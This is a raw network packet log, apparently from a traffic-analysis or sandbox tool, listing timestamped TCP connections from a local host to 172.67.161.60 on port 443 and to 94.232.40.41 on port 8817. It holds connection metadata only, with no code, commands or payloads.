                                                                                                                                Dec 17, 2024 17:57:30.174801111 CET50004443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:30.174830914 CET44350004172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:31.564476013 CET44350004172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:31.564544916 CET50004443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:31.565318108 CET50004443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:31.565330982 CET44350004172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:31.582360029 CET50004443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:31.582365990 CET44350004172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:32.257900953 CET44350004172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:32.258022070 CET50004443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:32.258060932 CET44350004172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:32.258116007 CET50004443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:32.258124113 CET44350004172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:32.258178949 CET50004443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:32.258210897 CET44350004172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:32.258265018 CET50004443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:32.258404016 CET50004443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:32.258436918 CET44350004172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:32.338145971 CET50005443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:32.338182926 CET44350005172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:32.338268995 CET50005443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:32.338583946 CET50005443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:32.338601112 CET44350005172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:33.615860939 CET44350005172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:33.615917921 CET50005443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:33.616960049 CET50005443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:33.616965055 CET44350005172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:33.619752884 CET50005443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:33.619757891 CET44350005172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:34.417972088 CET44350005172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:34.418092012 CET44350005172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:34.418164015 CET50005443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:34.418164968 CET50005443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:34.418612957 CET50005443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:34.418633938 CET44350005172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:34.492168903 CET50006443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:34.492239952 CET44350006172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:34.496820927 CET50006443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:34.497025013 CET50006443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:34.497042894 CET44350006172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:35.715014935 CET44350006172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:35.715117931 CET50006443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:35.715806961 CET50006443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:35.715842009 CET44350006172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:35.717634916 CET50006443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:35.717648983 CET44350006172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:36.473413944 CET44350006172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:36.473520041 CET44350006172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:36.474085093 CET50006443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:36.515597105 CET50006443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:36.515677929 CET44350006172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:36.973851919 CET50008443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:36.973903894 CET44350008172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:36.974236965 CET50008443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:36.974639893 CET50008443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:36.974657059 CET44350008172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:38.189892054 CET44350008172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:38.189963102 CET50008443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:38.190445900 CET50008443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:38.190464020 CET44350008172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:38.192384005 CET50008443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:38.192394972 CET44350008172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:38.939718008 CET44350008172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:38.939829111 CET44350008172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:38.939861059 CET50008443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:38.939918995 CET50008443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:38.940979958 CET50008443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:38.940992117 CET44350008172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:39.172687054 CET50009443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:39.172765017 CET44350009172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:39.172873020 CET50009443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:39.174127102 CET50009443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:39.174149036 CET44350009172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:40.750574112 CET44350009172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:40.750682116 CET50009443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:40.751169920 CET50009443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:40.751200914 CET44350009172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:40.753120899 CET50009443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:40.753135920 CET44350009172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:41.552542925 CET44350009172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:41.552642107 CET44350009172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:41.552635908 CET50009443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:41.552707911 CET50009443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:41.553034067 CET50009443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:41.553073883 CET44350009172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:41.655658007 CET50010443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:41.655730009 CET44350010172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:41.655797005 CET50010443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:41.656192064 CET50010443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:41.656204939 CET44350010172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:41.856978893 CET500118817192.168.2.694.232.40.41
                                                                                                                                Dec 17, 2024 17:57:41.976747990 CET88175001194.232.40.41192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:41.976860046 CET500118817192.168.2.694.232.40.41
                                                                                                                                Dec 17, 2024 17:57:41.992722034 CET500118817192.168.2.694.232.40.41
                                                                                                                                Dec 17, 2024 17:57:42.112364054 CET88175001194.232.40.41192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:43.036947966 CET44350010172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:43.037530899 CET50010443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:43.038088083 CET50010443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:43.038100004 CET44350010172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:43.042085886 CET50010443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:43.042092085 CET44350010172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:44.733319998 CET44350010172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:44.733402967 CET44350010172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:44.735955954 CET50010443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:44.736443996 CET50010443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:44.736466885 CET44350010172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:45.254604101 CET50012443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:45.254652023 CET44350012172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:45.254784107 CET50012443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:45.255110025 CET50012443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:45.255140066 CET44350012172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:45.623964071 CET88175001194.232.40.41192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:45.623981953 CET88175001194.232.40.41192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:45.623995066 CET88175001194.232.40.41192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:45.624017954 CET500118817192.168.2.694.232.40.41
                                                                                                                                Dec 17, 2024 17:57:45.624047995 CET500118817192.168.2.694.232.40.41
                                                                                                                                Dec 17, 2024 17:57:45.629241943 CET500118817192.168.2.694.232.40.41
                                                                                                                                Dec 17, 2024 17:57:45.749298096 CET88175001194.232.40.41192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:46.020395994 CET88175001194.232.40.41192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:46.020457029 CET500118817192.168.2.694.232.40.41
                                                                                                                                Dec 17, 2024 17:57:46.021379948 CET500118817192.168.2.694.232.40.41
                                                                                                                                Dec 17, 2024 17:57:46.142245054 CET88175001194.232.40.41192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:46.527740955 CET44350012172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:46.529026031 CET50012443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:46.530642033 CET50012443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:46.530642033 CET50012443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:46.530657053 CET44350012172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:46.530673981 CET44350012172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:47.274008989 CET44350012172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:47.274101973 CET44350012172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:47.276362896 CET50012443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:47.277684927 CET50012443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:47.277707100 CET44350012172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:47.372658014 CET50013443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:47.372739077 CET44350013172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:47.377216101 CET50013443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:47.380193949 CET50013443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:47.380229950 CET44350013172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:48.788734913 CET44350013172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:48.788880110 CET50013443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:48.790472031 CET50013443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:48.790472031 CET50013443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:48.790489912 CET44350013172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:48.790508986 CET44350013172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:49.488262892 CET44350013172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:49.488348961 CET50013443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:49.488409042 CET44350013172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:49.488467932 CET50013443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:49.488486052 CET44350013172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:49.488533974 CET50013443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:49.488543034 CET44350013172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:49.488603115 CET50013443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:49.488923073 CET50013443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:49.488955975 CET44350013172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:49.552944899 CET88174984394.232.40.41192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:49.553021908 CET498438817192.168.2.694.232.40.41
                                                                                                                                Dec 17, 2024 17:57:50.227281094 CET50014443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:50.227355003 CET44350014172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:50.227435112 CET50014443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:50.227726936 CET50014443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:50.227758884 CET44350014172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:51.457593918 CET44350014172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:51.457725048 CET50014443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:51.459367990 CET50014443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:51.459367990 CET50014443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:51.459383011 CET44350014172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:51.459405899 CET44350014172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:52.277215004 CET44350014172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:52.277369022 CET44350014172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:52.277405977 CET50014443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:52.277488947 CET50014443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:52.277581930 CET50014443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:52.277632952 CET44350014172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:52.491161108 CET50015443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:52.491298914 CET44350015172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:52.491467953 CET50015443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:52.491786003 CET50015443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:52.491822958 CET44350015172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:53.412497997 CET88175001194.232.40.41192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:53.412633896 CET500118817192.168.2.694.232.40.41
                                                                                                                                Dec 17, 2024 17:57:53.712624073 CET44350015172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:53.713246107 CET50015443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:53.713712931 CET50015443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:53.713727951 CET44350015172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:53.715013027 CET50015443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:53.715020895 CET44350015172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:54.445307970 CET44350015172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:54.445394993 CET50015443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:54.445426941 CET44350015172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:54.445482016 CET50015443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:54.445729017 CET50015443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:54.445772886 CET44350015172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:54.499468088 CET50016443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:54.499510050 CET44350016172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:54.499717951 CET50016443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:54.500029087 CET50016443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:54.500050068 CET44350016172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:55.760528088 CET44350016172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:55.760587931 CET50016443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:55.761389971 CET50016443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:55.761394978 CET44350016172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:55.763720036 CET50016443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:55.763725996 CET44350016172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:56.537050009 CET44350016172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:56.537184954 CET44350016172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:56.540805101 CET50016443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:56.540805101 CET50016443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:56.612384081 CET50017443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:56.612447023 CET44350017172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:56.617079973 CET50017443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:56.617080927 CET50017443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:56.617127895 CET44350017172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:56.871380091 CET50016443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:56.871413946 CET44350016172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:58.333684921 CET44350017172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:58.333764076 CET50017443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:58.335625887 CET50017443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:58.335649967 CET44350017172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:58.342189074 CET50017443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:58.342215061 CET44350017172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:59.064399004 CET44350017172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:59.064524889 CET44350017172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:59.064555883 CET50017443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:59.064800024 CET50017443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:59.064861059 CET50017443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:59.064903975 CET44350017172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:59.153486013 CET50018443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:59.153522968 CET44350018172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:57:59.154416084 CET50018443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:59.154560089 CET50018443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:57:59.154567003 CET44350018172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:00.520669937 CET44350018172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:00.526444912 CET50018443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:00.527956963 CET50018443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:00.527964115 CET44350018172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:00.528597116 CET50018443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:00.528603077 CET44350018172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:01.296298981 CET44350018172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:01.296391010 CET50018443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:01.296406031 CET44350018172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:01.296421051 CET44350018172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:01.296478033 CET50018443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:01.296822071 CET50018443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:01.296838045 CET44350018172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:01.697864056 CET50019443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:01.697931051 CET44350019172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:01.697998047 CET50019443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:01.698484898 CET50019443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:01.698502064 CET44350019172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:03.112303972 CET44350019172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:03.112438917 CET50019443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:03.113193989 CET50019443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:03.113202095 CET44350019172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:03.114443064 CET50019443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:03.114449978 CET44350019172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:03.821768045 CET44350019172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:03.821831942 CET50019443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:03.821858883 CET44350019172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:03.821880102 CET44350019172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:03.821918964 CET50019443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:03.821949005 CET50019443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:03.823164940 CET50019443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:03.823196888 CET44350019172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:04.000463963 CET50020443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:04.000523090 CET44350020172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:04.000593901 CET50020443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:04.000983000 CET50020443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:04.001004934 CET44350020172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:05.370481968 CET44350020172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:05.374430895 CET50020443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:05.376179934 CET50020443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:05.376179934 CET50020443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:05.376240015 CET44350020172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:05.376298904 CET44350020172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:06.036319971 CET44350020172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:06.036393881 CET50020443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:06.036422968 CET44350020172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:06.036449909 CET44350020172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:06.036475897 CET50020443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:06.036523104 CET50020443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:06.036843061 CET50020443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:06.036869049 CET44350020172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:06.190490961 CET50021443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:06.190546989 CET44350021172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:06.190618992 CET50021443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:06.194063902 CET50021443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:06.194080114 CET44350021172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:07.419801950 CET44350021172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:07.419939041 CET50021443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:07.420516014 CET50021443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:07.420522928 CET44350021172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:07.424436092 CET50021443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:07.424443007 CET44350021172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:08.282908916 CET44350021172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:08.282985926 CET50021443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:08.283010006 CET44350021172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:08.283041954 CET44350021172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:08.283051968 CET50021443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:08.283077002 CET50021443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:08.283391953 CET50021443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:08.283409119 CET44350021172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:08.375660896 CET50022443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:08.375785112 CET44350022172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:08.375906944 CET50022443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:08.376219034 CET50022443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:08.376257896 CET44350022172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:09.748670101 CET44350022172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:09.748759031 CET50022443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:09.749330997 CET50022443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:09.749345064 CET44350022172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:09.750844002 CET50022443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:09.750852108 CET44350022172.67.161.60192.168.2.6
